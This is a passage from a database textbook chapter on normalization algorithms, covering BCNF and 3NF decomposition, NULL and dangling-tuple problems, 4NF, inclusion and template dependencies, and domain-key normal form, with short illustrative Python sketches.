Algorithm 5. Relational Decomposition into BCNF with Nonadditive
Join Property

Input: A universal relation R and a set of functional dependencies F on the
attributes of R.

1. Set D := {R} ;

2. While there is a relation schema Q in D that is not in BCNF do
{

choose a relation schema Q in D that is not in BCNF;
find a functional dependency X → Y in Q that violates BCNF;
replace Q in D by two relation schemas (Q – Y) and (X ∪ Y);

} ;


Each time through the loop in Algorithm 5, we decompose one relation schema Q
that is not in BCNF into two relation schemas. According to Property NJB for
binary decompositions and Claim 2, the decomposition D has the nonadditive join
property. At the end of the algorithm, all relation schemas in D will be in BCNF. The
reader can check that the normalization example in Figures 12 and 13 from the
chapter “Basics of Functional Dependencies and Normalization for Relational
Databases” basically follows this algorithm. The functional dependencies FD3, FD4,
and later FD5 violate BCNF, so the LOTS relation is decomposed appropriately into
BCNF relations, and the decomposition then satisfies the nonadditive join property.
Similarly, if we apply the algorithm to the TEACH relation schema from Figure 14
of that same chapter, it is decomposed into TEACH1(Instructor, Student) and
TEACH2(Instructor, Course) because the dependency FD2 Instructor → Course vio-
lates BCNF.

In step 2 of Algorithm 5, it is necessary to determine whether a relation schema Q is
in BCNF or not. One method for doing this is to test, for each functional depend-
ency X → Y in Q, whether X+ fails to include all the attributes in Q, thereby deter-
mining whether or not X is a (super)key in Q. Another technique is based on an
observation that whenever a relation schema Q has a BCNF violation, there exists a
pair of attributes A and B in Q such that {Q – {A, B} } → A; by computing the clo-
sure {Q – {A, B} }+ for each pair of attributes {A, B} of Q, and checking whether the
closure includes A (or B), we can determine whether Q is in BCNF.
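The following Python sketch of Algorithm 5 uses the attribute-closure test described above to detect a BCNF violation. For simplicity it examines only the dependencies in F whose left-hand side lies entirely inside Q, whereas a complete implementation would work with the projection of F onto Q; all names are ours:

# Sketch of Algorithm 5: BCNF decomposition with the nonadditive join property.

def closure(X, F):
    result = set(X)
    changed = True
    while changed:
        changed = False
        for lhs, rhs in F:
            if lhs <= result and not rhs <= result:
                result |= rhs
                changed = True
    return result

def bcnf_violation(Q, F):
    """Return an FD (X, Y) that violates BCNF in Q, or None."""
    for X, Y in F:
        if X <= Q:
            Yq = (Y & Q) - X
            if Yq and not Q <= closure(X, F):   # X is not a superkey of Q
                return (set(X), Yq)
    return None

def decompose_bcnf(R, F):
    D = [set(R)]                                # Step 1
    while True:                                 # Step 2
        for i, Q in enumerate(D):
            v = bcnf_violation(Q, F)
            if v:
                X, Y = v
                D[i:i + 1] = [Q - Y, X | Y]     # replace Q by (Q - Y) and (X ∪ Y)
                break
        else:
            return D

R = {'Student', 'Course', 'Instructor'}
F = [({'Student', 'Course'}, {'Instructor'}),
     ({'Instructor'}, {'Course'})]
print(decompose_bcnf(R, F))
# the two schemas {Instructor, Student} and {Instructor, Course}

On the TEACH example it splits the schema on Instructor → Course, yielding TEACH1(Instructor, Student) and TEACH2(Instructor, Course) as in the text.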

3.3 Dependency-Preserving and Nonadditive (Lossless)
Join Decomposition into 3NF Schemas

So far, in Algorithm 4 we showed how to achieve a 3NF design with the potential for
loss of information, and in Algorithm 5 we showed how to achieve a BCNF design
with the potential loss of certain functional dependencies. By now we know that it is
not possible to have all three of the following: (1) guaranteed nonlossy design, (2)
guaranteed dependency preservation, and (3) all relations in BCNF. As we have said
before, the first condition is a must and cannot be compromised. The second condi-
tion is desirable, but not a must, and may have to be relaxed if we insist on achiev-
ing BCNF. Now we give an alternative algorithm where we achieve conditions 1 and
2 and only guarantee 3NF. A simple modification to Algorithm 4, shown as
Algorithm 6, yields a decomposition D of R that does the following:

■ Preserves dependencies

■ Has the nonadditive join property

■ Is such that each resulting relation schema in the decomposition is in 3NF

Because Algorithm 6 achieves both of the desirable properties, rather than only
functional dependency preservation as guaranteed by Algorithm 4, it is preferred
over Algorithm 4.

Algorithm 6. Relational Synthesis into 3NF with Dependency Preservation
and Nonadditive Join Property

Input: A universal relation R and a set of functional dependencies F on the
attributes of R.


7Step 3 of Algorithm 4 is not needed in Algorithm 6 to preserve attributes because the key will include
any unplaced attributes; these are the attributes that do not participate in any functional dependency.
8Note that there is an additional type of dependency: R is a projection of the join of two or more relations
in the schema. This type of redundancy is considered a join dependency. Hence, technically, it may con-
tinue to exist without disturbing the 3NF status for the schema.

1. Find a minimal cover G for F (use Algorithm 2).

2. For each left-hand-side X of a functional dependency that appears in G, cre-
ate a relation schema in D with attributes {X ∪ {A1} ∪ {A2} … ∪ {Ak} },
where X → A1, X → A2, …, X → Ak are the only dependencies in G with X as
left-hand-side (X is the key of this relation).

3. If none of the relation schemas in D contains a key of R, then create one
more relation schema in D that contains attributes that form a key of R.7

(Algorithm 2(a) may be used to find a key.)

4. Eliminate redundant relations from the resulting set of relations in the rela-
tional database schema. A relation R is considered redundant if R is a projec-
tion of another relation S in the schema; alternatively, R is subsumed by S.8

Step 3 of Algorithm 6 involves identifying a key K of R. Algorithm 2(a) can be used
to identify a key K of R based on the set of given functional dependencies F. Notice
that the set of functional dependencies used to determine a key in Algorithm 2(a)
could be either F or G, since they are equivalent.

Example 1 of Algorithm 6. Let us revisit the example given earlier at the end of
Algorithm 4. The minimal cover G holds as before. The second step produces rela-
tions R1 and R2 as before. However, now in step 3, we will generate a relation corre-
sponding to the key {Emp_ssn, Pno}. Hence, the resulting design contains:

R1 (Emp_ssn , Esal, Ephone, Dno)
R2 (Pno, Pname, Plocation)
R3 (Emp_ssn, Pno)

This design achieves both the desirable properties of dependency preservation and
nonadditive join.
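Continuing the sketch of Algorithm 4 given earlier, the following Python fragment adds steps 3 and 4 of Algorithm 6. Here find_key follows the idea of Algorithm 2(a), and subsumption in step 4 is approximated simply by attribute containment; all names are ours:

# Sketch of steps 3-4 of Algorithm 6, continuing the synthesis example above.

def closure(X, F):
    result = set(X)
    changed = True
    while changed:
        changed = False
        for lhs, rhs in F:
            if lhs <= result and not rhs <= result:
                result |= rhs
                changed = True
    return result

def find_key(R, G):
    """Algorithm 2(a) idea: start from R and drop attributes that are not needed."""
    K = set(R)
    for A in sorted(R):              # the order decides which key is found
        if closure(K - {A}, G) >= set(R):
            K.discard(A)
    return K

R = {'Emp_ssn', 'Pno', 'Esal', 'Ephone', 'Dno', 'Pname', 'Plocation'}
G = [({'Emp_ssn'}, {'Esal', 'Ephone', 'Dno'}),
     ({'Pno'}, {'Pname', 'Plocation'})]
schemas = [{'Emp_ssn', 'Esal', 'Ephone', 'Dno'},      # from step 2 (R1 and R2)
           {'Pno', 'Pname', 'Plocation'}]

key = find_key(R, G)                                  # {'Emp_ssn', 'Pno'}
if not any(key <= s for s in schemas):                # step 3: add a key relation
    schemas.append(set(key))

# Step 4: drop a schema whose attributes are contained in another schema.
schemas = [s for s in schemas
           if not any(s < t for t in schemas if t is not s)]
print([sorted(s) for s in schemas])

For the example above it adds R3(Emp_ssn, Pno) and removes nothing, giving the three-relation design just shown.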

Example 2 of Algorithm 6 (Case X ). Consider the relation schema LOTS1A
shown in Figure 13(a) from the chapter “Basics of Functional Dependencies and
Normalization for Relational Databases.” Assume that this relation is given as a uni-
versal relation with the following functional dependencies:

FD1: Property_id → Lot#, County, Area
FD2: Lot#, County → Area, Property_id
FD3: Area → County

These were called FD1, FD2, and FD5 in Figure 13(a) of that chapter. For ease of reference, let us abbreviate the above attributes with the first letter for each and repre-
sent the functional dependencies as the set

F : { P → LCA, LC → AP, A → C }.

If we apply the minimal cover Algorithm 2 to F, in step 2 we first represent the set
F as

F : {P → L, P → C, P → A, LC → A, LC → P, A → C}.

In the set F, P → A can be inferred from P → LC and LC → A by transitivity; it is
therefore redundant. Thus, one possible minimal cover is

Minimal cover GX: {P → LC, LC → AP, A → C }.

In step 2 of Algorithm 6 we produce design X (before removing redundant rela-
tions) using the above minimal cover as

Design X: R1 (P, L, C), R2 (L, C, A, P), and R3 (A, C).

In step 4 of the algorithm, we find that R3 is subsumed by R2 (that is, R3 is always a
projection of R2), and R1 is a projection of R2 as well. Hence both of those relations
are redundant. Thus the 3NF schema that achieves both of the desirable properties
is (after removing redundant relations)

Design X: R2 (L, C, A, P).

or, in other words, it is identical to the relation LOTS1A (Lot#, County, Area,
Property_id), which was determined to be in 3NF.

Example 2 of Algorithm 6 (Case Y ). Starting with LOTS1A as the universal rela-
tion and with the same given set of functional dependencies, the second step of the
minimal cover Algorithm 2 produces, as before

F: {P → C, P → A, P → L, LC → A, LC → P, A → C}.

The FD LC → A may be considered redundant because LC → P and P → A imply
LC → A by transitivity. Also, P → C may be considered redundant because P → A
and A → C imply P → C by transitivity. This gives a different minimal cover as

Minimal cover GY: { P → LA, LC → P, A → C }.

The alternative design Y produced by the algorithm now is

Design Y: S1 (P, A, L), S2 (L, C, P), and S3 (A, C).

Note that this design has three 3NF relations, none of which can be considered as
redundant by the condition in step 4. All FDs in the original set F are preserved. The
reader will notice that out of the above three relations, relations S1 and S3 were pro-
duced as the BCNF design (implying that S2 is redundant in the presence of S1 and
S3). However, we cannot eliminate relation S2 from the set of three 3NF relations
above since it is not a projection of either S1 or S3. Design Y therefore remains as one
possible final result of applying Algorithm 6 to the given universal relation that pro-
vides relations in 3NF.
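A short Python check (helper names ours) confirms that both covers are indeed equivalent to the original F, which is why either design X or design Y can legitimately result from Algorithm 6:

# Checking that the two minimal covers GX and GY are equivalent to F.

def closure(X, F):
    result = set(X)
    changed = True
    while changed:
        changed = False
        for lhs, rhs in F:
            if lhs <= result and not rhs <= result:
                result |= rhs
                changed = True
    return result

def covers(F, G):
    """True if every FD X -> Y in G is implied by F."""
    return all(Y <= closure(X, F) for X, Y in G)

def equivalent(F, G):
    return covers(F, G) and covers(G, F)

F  = [({'P'}, {'L', 'C', 'A'}), ({'L', 'C'}, {'A', 'P'}), ({'A'}, {'C'})]
GX = [({'P'}, {'L', 'C'}), ({'L', 'C'}, {'A', 'P'}), ({'A'}, {'C'})]
GY = [({'P'}, {'L', 'A'}), ({'L', 'C'}, {'P'}), ({'A'}, {'C'})]
print(equivalent(F, GX), equivalent(F, GY))   # True True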

It is important to note that the theory of nonadditive join decompositions is based
on the assumption that no NULL values are allowed for the join attributes. The next
section discusses some of the problems that NULLs may cause in relational decom-
positions and provides a general discussion of the algorithms for relational design
by synthesis presented in this section.

4 About Nulls, Dangling Tuples,
and Alternative Relational Designs

In this section we will discuss a few general issues related to problems that arise
when relational design is not approached properly.

4.1 Problems with NULL Values and Dangling Tuples
We must carefully consider the problems associated with NULLs when designing a
relational database schema. There is no fully satisfactory relational design theory as
yet that includes NULL values. One problem occurs when some tuples have NULL
values for attributes that will be used to join individual relations in the decomposi-
tion. To illustrate this, consider the database shown in Figure 2(a), where two rela-
tions EMPLOYEE and DEPARTMENT are shown. The last two employee
tuples—‘Berger’ and ‘Benitez’—represent newly hired employees who have not yet
been assigned to a department (assume that this does not violate any integrity con-
straints). Now suppose that we want to retrieve a list of (Ename, Dname) values for
all the employees. If we apply the NATURAL JOIN operation on EMPLOYEE and
DEPARTMENT (Figure 2(b)), the two aforementioned tuples will not appear in the
result. The OUTER JOIN operation can deal with this problem. Recall that if we take
the LEFT OUTER JOIN of EMPLOYEE with DEPARTMENT, tuples in EMPLOYEE that
have NULL for the join attribute will still appear in the result, joined with an
imaginary tuple in DEPARTMENT that has NULLs for all its attribute values. Figure
2(c) shows the result.

In general, whenever a relational database schema is designed in which two or more
relations are interrelated via foreign keys, particular care must be devoted to watch-
ing for potential NULL values in foreign keys. This can cause unexpected loss of
information in queries that involve joins on that foreign key. Moreover, if NULLs
occur in other attributes, such as Salary, their effect on built-in functions such as
SUM and AVERAGE must be carefully evaluated.
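The effect can be illustrated with a toy Python sketch (the mini relation states and helper functions below are made up for illustration; they are not part of the text and are not SQL):

# NATURAL JOIN vs. LEFT OUTER JOIN on the join attribute Dnum, showing how
# tuples with NULL (None) for Dnum drop out of the inner join.

employees = [
    {'Ename': 'Smith, John B.',    'Dnum': 5},
    {'Ename': 'Berger, Anders C.', 'Dnum': None},   # newly hired, no department
]
departments = [{'Dnum': 5, 'Dname': 'Research'}]

def natural_join(emps, depts):
    return [{**e, **d} for e in emps for d in depts
            if e['Dnum'] is not None and e['Dnum'] == d['Dnum']]

def left_outer_join(emps, depts):
    result = []
    for e in emps:
        matches = [d for d in depts
                   if e['Dnum'] is not None and e['Dnum'] == d['Dnum']]
        if matches:
            result.extend({**e, **d} for d in matches)
        else:
            result.append({**e, 'Dname': None})      # pad with NULLs
    return result

print(len(natural_join(employees, departments)))     # 1 -- Berger is lost
print(len(left_outer_join(employees, departments)))  # 2 -- Berger is retained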

A related problem is that of dangling tuples, which may occur if we carry a decom-
position too far. Suppose that we decompose the EMPLOYEE relation in Figure 2(a)
further into EMPLOYEE_1 and EMPLOYEE_2, shown in Figure 3(a) and 3(b).9 If we
apply the NATURAL JOIN operation to EMPLOYEE_1 and EMPLOYEE_2, we get the
original EMPLOYEE relation. However, we may use the alternative representation,
shown in Figure 3(c), where we do not include a tuple in EMPLOYEE_3 if the employee has not been assigned a department (instead of including a tuple with NULL for Dnum as in EMPLOYEE_2). If we use EMPLOYEE_3 instead of EMPLOYEE_2 and apply a NATURAL JOIN on EMPLOYEE_1 and EMPLOYEE_3, the tuples for Berger and Benitez will not appear in the result; these are called dangling tuples in EMPLOYEE_1 because they are represented in only one of the two relations that represent employees, and hence are lost if we apply an (INNER) JOIN operation.

9This sometimes happens when we apply vertical fragmentation to a relation in the context of a distributed database.

[Figure 2: Issues with NULL-value joins. (a) Some EMPLOYEE tuples have NULL for the join attribute Dnum. (b) Result of applying NATURAL JOIN to the EMPLOYEE and DEPARTMENT relations. (c) Result of applying LEFT OUTER JOIN to EMPLOYEE and DEPARTMENT.]

[Figure 3: The dangling tuple problem. (a) The relation EMPLOYEE_1 (includes all attributes of EMPLOYEE from Figure 2(a) except Dnum). (b) The relation EMPLOYEE_2 (includes the Dnum attribute with NULL values). (c) The relation EMPLOYEE_3 (includes the Dnum attribute but does not include tuples for which Dnum has NULL values).]

4.2 Discussion of Normalization Algorithms
and Alternative Relational Designs

One of the problems with the normalization algorithms we described is that the
database designer must first specify all the relevant functional dependencies among
the database attributes. This is not a simple task for a large database with hundreds
of attributes. Failure to specify one or two important dependencies may result in an
undesirable design. Another problem is that these algorithms are not deterministic
in general. For example, the synthesis algorithms (Algorithms 4 and 6) require the
specification of a minimal cover G for the set of functional dependencies F. Because
there may be in general many minimal covers corresponding to F, as we illustrated
in Example 2 of Algorithm 6 above, the algorithm can give different designs
depending on the particular minimal cover used. Some of these designs may not be
desirable. The decomposition algorithm to achieve BCNF (Algorithm 5) depends
on the order in which the functional dependencies are supplied to the algorithm to
check for BCNF violation. Again, it is possible that many different designs may arise
corresponding to the same set of functional dependencies, depending on the order
in which such dependencies are considered for violation of BCNF. Some of the
designs may be preferred, whereas others may be undesirable.

It is not always possible to find a decomposition into relation schemas that pre-
serves dependencies and allows each relation schema in the decomposition to be in
BCNF (instead of 3NF as in Algorithm 6). We can check the 3NF relation schemas
in the decomposition individually to see whether each satisfies BCNF. If some rela-
tion schema Ri is not in BCNF, we can choose to decompose it further or to leave it
as it is in 3NF (with some possible update anomalies).

To illustrate the above points, let us revisit the LOTS1A relation in Figure 13(a) from
the chapter “Basics of Functional Dependencies and Normalization for Relational
Databases.” It is a relation in 3NF, which is not in BCNF as was shown in Section 5
of that chapter. We also showed that starting with the functional dependencies
(FD1, FD2, and FD5 in Figure 13(a) same chapter), using the bottom-up approach
to design and applying Algorithm 6, it is possible to either come up with the LOTS1A
relation as the 3NF design (which was called design X previously), or an alternate
design Y which consists of three relations S1, S2, S3 (design Y), each of which is a
3NF relation. Note that if we test design Y further for BCNF, each of S1, S2, and S3
turns out to be individually in BCNF. The design X, however, when tested for BCNF,
fails the test. It yields the two relations S1 and S3 by applying Algorithm 5 (because
of the violating functional dependency A → C). Thus, the bottom-up design proce-
dure of applying Algorithm 6 to design 3NF relations to achieve both properties and
then applying Algorithm 5 to achieve BCNF with the nonadditive join property
(and sacrificing functional dependency preservation) yields S1, S2, S3 as the final
BCNF design by one route (Y design route) and S1, S3 by the other route (X design
route). This happens due to the multiple minimal covers for the original set of func-
tional dependencies. Note that S2 is a redundant relation in the Y design; however, it
does not violate the nonadditive join constraint. It is easy to see that S2 is a valid and
meaningful relation that has its two candidate keys, (L, C) and P, placed side by side.

Table 1 summarizes the properties of the algorithms discussed in this chapter so far.


Table 1 Summary of the Algorithms Discussed in This Chapter

Algorithm 1. Input: an attribute or a set of attributes X, and a set of FDs F. Output: the set of attributes in the closure of X with respect to F. Properties/Purpose: determine all the attributes that can be functionally determined from X. Remarks: the closure of a key is the entire relation.

Algorithm 2. Input: a set of functional dependencies F. Output: the minimal cover of functional dependencies. Properties/Purpose: to determine the minimal cover of a set of dependencies F. Remarks: multiple minimal covers may exist—depends on the order of selecting functional dependencies.

Algorithm 2(a). Input: a relation schema R with a set of functional dependencies F. Output: a key K of R. Properties/Purpose: to find a key K (that is a subset of R). Remarks: the entire relation R is always a default superkey.

Algorithm 3. Input: a decomposition D of R and a set F of functional dependencies. Output: Boolean result: yes or no for the nonadditive join property. Properties/Purpose: testing for nonadditive join decomposition. Remarks: see the simpler test NJB in Section 2.4 for binary decompositions.

Algorithm 4. Input: a relation R and a set of functional dependencies F. Output: a set of relations in 3NF. Properties/Purpose: dependency preservation. Remarks: no guarantee of satisfying the lossless join property.

Algorithm 5. Input: a relation R and a set of functional dependencies F. Output: a set of relations in BCNF. Properties/Purpose: nonadditive join decomposition. Remarks: no guarantee of dependency preservation.

Algorithm 6. Input: a relation R and a set of functional dependencies F. Output: a set of relations in 3NF. Properties/Purpose: nonadditive join and dependency-preserving decomposition. Remarks: may not achieve BCNF, but achieves all desirable properties and 3NF.

Algorithm 7. Input: a relation R and a set of functional and multivalued dependencies. Output: a set of relations in 4NF. Properties/Purpose: nonadditive join decomposition. Remarks: no guarantee of dependency preservation.

5 Discussion of Multivalued Dependencies and
4NF

We now revisit multivalued dependencies (MVDs) in order to state the rules of
inference that apply to them.


5.1 Inference Rules for Functional
and Multivalued Dependencies

As with functional dependencies (FDs), inference rules for multivalued dependen-
cies (MVDs) have been developed. It is better, though, to develop a unified frame-
work that includes both FDs and MVDs so that both types of constraints can be
considered together. The following inference rules IR1 through IR8 form a sound
and complete set for inferring functional and multivalued dependencies from a
given set of dependencies. Assume that all attributes are included in a universal rela-
tion schema R = {A1, A2, …, An} and that X, Y, Z, and W are subsets of R.

IR1 (reflexive rule for FDs): If X ⊇ Y, then X → Y.
IR2 (augmentation rule for FDs): {X → Y} |= XZ → YZ.
IR3 (transitive rule for FDs): {X → Y, Y → Z} |= X → Z.
IR4 (complementation rule for MVDs): {X →→ Y} |= {X →→ (R – (X ∪ Y))}.
IR5 (augmentation rule for MVDs): If X →→ Y and W ⊇ Z, then WX →→ YZ.
IR6 (transitive rule for MVDs): {X →→ Y, Y →→ Z} |= X →→ (Z – Y).
IR7 (replication rule for FD to MVD): {X → Y} |= X →→ Y.
IR8 (coalescence rule for FDs and MVDs): If X →→ Y and there exists W with the
properties that (a) W ∩ Y is empty, (b) W → Z, and (c) Y ⊇ Z, then X → Z.

IR1 through IR3 are Armstrong’s inference rules for FDs alone. IR4 through IR6 are
inference rules pertaining to MVDs only. IR7 and IR8 relate FDs and MVDs. In par-
ticular, IR7 says that a functional dependency is a special case of a multivalued
dependency; that is, every FD is also an MVD because it satisfies the formal defini-
tion of an MVD. However, this equivalence has a catch: An FD X → Y is an MVD
X →→ Y with the additional implicit restriction that at most one value of Y is associ-
ated with each value of X.10 Given a set F of functional and multivalued dependen-
cies specified on R = {A1, A2, …, An}, we can use IR1 through IR8 to infer the
(complete) set of all dependencies (functional or multivalued) F+ that will hold in
every relation state r of R that satisfies F. We again call F+ the closure of F.

5.2 Fourth Normal Form Revisited
The definition of fourth normal form (4NF) is:

Definition. A relation schema R is in 4NF with respect to a set of dependen-
cies F (that includes functional dependencies and multivalued dependencies)
if, for every nontrivial multivalued dependency X →→ Y in F+, X is a superkey
for R.


10That is, the set of values of Y determined by a value of X is restricted to being a singleton set with only
one value. Hence, in practice, we never view an FD as an MVD.

[Figure 4: Decomposing a relation state of EMP that is not in 4NF. (a) The EMP relation with additional tuples. (b) Two corresponding 4NF relations, EMP_PROJECTS and EMP_DEPENDENTS.]

To illustrate the importance of 4NF, Figure 4(a) shows the EMP relation with an
additional employee, ‘Brown’, who has three dependents (‘Jim’, ‘Joan’, and ‘Bob’) and
works on four different projects (‘W’, ‘X’, ‘Y’, and ‘Z’). There are 16 tuples in EMP in
Figure 4(a). If we decompose EMP into EMP_PROJECTS and EMP_DEPENDENTS,
as shown in Figure 4(b), we need to store a total of only 11 tuples in both relations.
Not only would the decomposition save on storage, but the update anomalies asso-
ciated with multivalued dependencies would also be avoided. For example, if
‘Brown’ starts working on a new additional project ‘P,’ we must insert three tuples in
EMP—one for each dependent. If we forget to insert any one of those, the relation
violates the MVD and becomes inconsistent in that it incorrectly implies a relation-
ship between project and dependent.

If the relation has nontrivial MVDs, then insert, delete, and update operations on
single tuples may cause additional tuples to be modified besides the one in question.
If the update is handled incorrectly, the meaning of the relation may change.
However, after normalization into 4NF, these update anomalies disappear. For
example, to add the information that ‘Brown’ will be assigned to project ‘P’, only a
single tuple need be inserted in the 4NF relation EMP_PROJECTS.
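The tuple counts in this example can be reproduced with a few lines of Python (the data dictionary below is our own encoding of the information in Figure 4(a)):

# In the un-normalized EMP relation, an employee's projects and dependents must
# appear in all combinations (a cross product); the 4NF design stores each list once.

from itertools import product

emp_data = {
    'Smith': {'projects': ['X', 'Y'], 'dependents': ['John', 'Anna']},
    'Brown': {'projects': ['W', 'X', 'Y', 'Z'],
              'dependents': ['Jim', 'Joan', 'Bob']},
}

emp_tuples = [(e, p, d)
              for e, v in emp_data.items()
              for p, d in product(v['projects'], v['dependents'])]
emp_projects = [(e, p) for e, v in emp_data.items() for p in v['projects']]
emp_dependents = [(e, d) for e, v in emp_data.items() for d in v['dependents']]

print(len(emp_tuples))                          # 16 tuples in EMP
print(len(emp_projects) + len(emp_dependents))  # 11 tuples in the 4NF design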

The EMP relation in Figure 15(a) from the chapter “Basics of Functional
Dependencies and Normalization for Relational Databases” is not in 4NF because it
represents two independent 1:N relationships—one between employees and the
projects they work on and the other between employees and their dependents. We
sometimes have a relationship among three entities that depends on all three partic-
ipating entities, such as the SUPPLY relation shown in Figure 15(c) from the same
chapter. (Consider only the tuples in Figure 15(c) of that chapter above the dashed
line for now.) In this case a tuple represents a supplier supplying a specific part to a
particular project, so there are no nontrivial MVDs. Hence, the SUPPLY all-key rela-
tion is already in 4NF and should not be decomposed.

5.3 Nonadditive Join Decomposition into 4NF Relations
Whenever we decompose a relation schema R into R1 = (X ∪ Y) and R2 = (R – Y)
based on an MVD X →→ Y that holds in R, the decomposition has the nonadditive
join property. It can be shown that this is a necessary and sufficient condition for
decomposing a schema into two schemas that have the nonadditive join property, as
given by Property NJB′, which is a further generalization of Property NJB given earlier.
Property NJB dealt with FDs only, whereas NJB′ deals with both FDs and MVDs
(recall that an FD is also an MVD).

Property NJB′. The relation schemas R1 and R2 form a nonadditive join
decomposition of R with respect to a set F of functional and multivalued
dependencies if and only if

(R1 ∩ R2) →→ (R1 – R2)
or, by symmetry, if and only if

(R1 ∩ R2) →→ (R2 – R1).

We can use a slight modification of Algorithm 5 to develop Algorithm 7, which cre-
ates a nonadditive join decomposition into relation schemas that are in 4NF (rather
than in BCNF). As with Algorithm 5, Algorithm 7 does not necessarily produce a
decomposition that preserves FDs.

Algorithm 7. Relational Decomposition into 4NF Relations with Nonadditive
Join Property

Input: A universal relation R and a set of functional and multivalued depend-
encies F.

1. Set D:= { R };

2. While there is a relation schema Q in D that is not in 4NF, do
{ choose a relation schema Q in D that is not in 4NF;

find a nontrivial MVD X →→ Y in Q that violates 4NF;
replace Q in D by two relation schemas (Q – Y) and (X ∪ Y);

};
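As a minimal illustration (the function name is ours, and detecting the violating MVD itself requires the MVD inference rules of Section 5.1, which is not shown), the single decomposition step used by Algorithm 7 can be written as:

# Given a nontrivial MVD X ->> Y that violates 4NF in Q,
# replace Q by (Q - Y) and (X ∪ Y).

def split_on_mvd(Q, X, Y):
    return Q - Y, X | Y

# EMP(Ename, Pname, Dname) with Ename ->> Pname (and hence Ename ->> Dname):
Q = {'Ename', 'Pname', 'Dname'}
print(split_on_mvd(Q, {'Ename'}, {'Pname'}))
# the two schemas {Ename, Dname} and {Ename, Pname}, i.e. EMP_DEPENDENTS and EMP_PROJECTS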


6 Other Dependencies and Normal Forms
Another type of dependency is called join dependency (JD). It arises when a rela-
tion is decomposable into a set of projected relations that can be joined back to
yield the original relation. After defining JD, we define the fifth normal form based
on it. In the present section we will introduce some other types of dependencies.

6.1 Inclusion Dependencies
Inclusion dependencies were defined in order to formalize two types of interrela-
tional constraints:

■ The foreign key (or referential integrity) constraint cannot be specified as a
functional or multivalued dependency because it relates attributes across
relations.

■ The constraint between two relations that represent a class/subclass relation-
ship also has no formal definition in terms of the functional, multivalued,
and join dependencies.


Definition. An inclusion dependency R.X < S.Y between two sets of attributes—X of relation schema R, and Y of relation schema S—specifies the constraint that, at any specific time when r is a relation state of R and s a relation state of S, we must have

πX(r(R)) ⊆ πY(s(S))

The ⊆ (subset) relationship does not necessarily have to be a proper subset. Obviously, the sets of attributes on which the inclusion dependency is specified—X of R and Y of S—must have the same number of attributes. In addition, the domains for each pair of corresponding attributes should be compatible. For example, if X = {A1, A2, ..., An} and Y = {B1, B2, ..., Bn}, one possible correspondence is to have dom(Ai) compatible with dom(Bi) for 1 ≤ i ≤ n. In this case, we say that Ai corresponds to Bi.

For example, we can specify the following inclusion dependencies on the relational schema in Figure 1 from the chapter “Basics of Functional Dependencies and Normalization for Relational Databases”:

DEPARTMENT.Dmgr_ssn < EMPLOYEE.Ssn
WORKS_ON.Ssn < EMPLOYEE.Ssn
EMPLOYEE.Dnumber < DEPARTMENT.Dnumber
PROJECT.Dnum < DEPARTMENT.Dnumber
WORKS_ON.Pnumber < PROJECT.Pnumber
DEPT_LOCATIONS.Dnumber < DEPARTMENT.Dnumber

All the preceding inclusion dependencies represent referential integrity constraints. We can also use inclusion dependencies to represent class/subclass relationships. For example, in the relational schema of Figure A.1 (in Appendix: Figures at the end of this chapter), we can specify the following inclusion dependencies:

EMPLOYEE.Ssn < PERSON.Ssn
ALUMNUS.Ssn < PERSON.Ssn
STUDENT.Ssn < PERSON.Ssn

As with other types of dependencies, there are inclusion dependency inference rules (IDIRs). The following are three examples:

IDIR1 (reflexivity): R.X < R.X.
IDIR2 (attribute correspondence): If R.X < S.Y, where X = {A1, A2, ..., An} and Y = {B1, B2, ..., Bn} and Ai corresponds to Bi, then R.Ai < S.Bi for 1 ≤ i ≤ n.
IDIR3 (transitivity): If R.X < S.Y and S.Y < T.Z, then R.X < T.Z.

The preceding inference rules were shown to be sound and complete for inclusion dependencies. So far, no normal forms have been developed based on inclusion dependencies.

6.2 Template Dependencies

Template dependencies provide a technique for representing constraints in relations that typically have no easy and formal definitions. No matter how many types of dependencies we develop, some peculiar constraint may come up based on the semantics of attributes within relations that cannot be represented by any of them. The idea behind template dependencies is to specify a template—or example—that defines each constraint or dependency.

There are two types of templates: tuple-generating templates and constraint-generating templates. A template consists of a number of hypothesis tuples that are meant to show an example of the tuples that may appear in one or more relations. The other part of the template is the template conclusion. For tuple-generating templates, the conclusion is a set of tuples that must also exist in the relations if the hypothesis tuples are there. For constraint-generating templates, the template conclusion is a condition that must hold on the hypothesis tuples. Using constraint-generating templates, we are able to define semantic constraints—those that are beyond the scope of the relational model in terms of its data definition language and notation.

Figure 5 shows how we may define functional, multivalued, and inclusion dependencies by templates.

Figure 6 shows how we may specify the constraint that an employee’s salary cannot be higher than the salary of his or her direct supervisor on the relation schema EMPLOYEE in Figure A.2.

[Figure 5: Templates for some common types of dependencies. (a) Template for the functional dependency X → Y. (b) Template for the multivalued dependency X →→ Y. (c) Template for the inclusion dependency R.X < S.Y.]

[Figure 6: Template for the constraint that an employee’s salary must be less than the supervisor’s salary, on EMPLOYEE = {Name, Ssn, ..., Salary, Supervisor_ssn}; the conclusion is c < f.]

6.3 Functional Dependencies Based on Arithmetic Functions and Procedures

Sometimes some attributes in a relation may be related via some arithmetic function or a more complicated functional relationship. As long as a unique value of Y is associated with every X, we can still consider that the FD X → Y exists. For example, in the relation

ORDER_LINE (Order#, Item#, Quantity, Unit_price, Extended_price, Discounted_price)

each tuple represents an item from an order with a particular quantity, and the price per unit for that item. In this relation, (Quantity, Unit_price) → Extended_price by the formula Extended_price = Unit_price * Quantity. Hence, there is a unique value for Extended_price for every pair (Quantity, Unit_price), and thus it conforms to the definition of functional dependency.

Moreover, there may be a procedure that takes into account the quantity discounts, the type of item, and so on and computes a discounted price for the total quantity ordered for that item. Therefore, we can say (Item#, Quantity, Unit_price) → Discounted_price, or (Item#, Quantity, Extended_price) → Discounted_price. To check the above FD, a more complex procedure COMPUTE_TOTAL_PRICE may have to be called into play. Although the above kinds of FDs are technically present in most relations, they are not given particular attention during normalization.

6.4 Domain-Key Normal Form

There is no hard-and-fast rule about defining normal forms only up to 5NF. Historically, the process of normalization and the process of discovering undesirable dependencies were carried through 5NF, but it has been possible to define stricter normal forms that take into account additional types of dependencies and constraints. The idea behind domain-key normal form (DKNF) is to specify (theoretically, at least) the ultimate normal form that takes into account all possible types of dependencies and constraints. A relation schema is said to be in DKNF if all constraints and dependencies that should hold on the valid relation states can be enforced simply by enforcing the domain constraints and key constraints on the relation. For a relation in DKNF, it becomes very straightforward to enforce all database constraints by simply checking that each attribute value in a tuple is of the appropriate domain and that every key constraint is enforced.

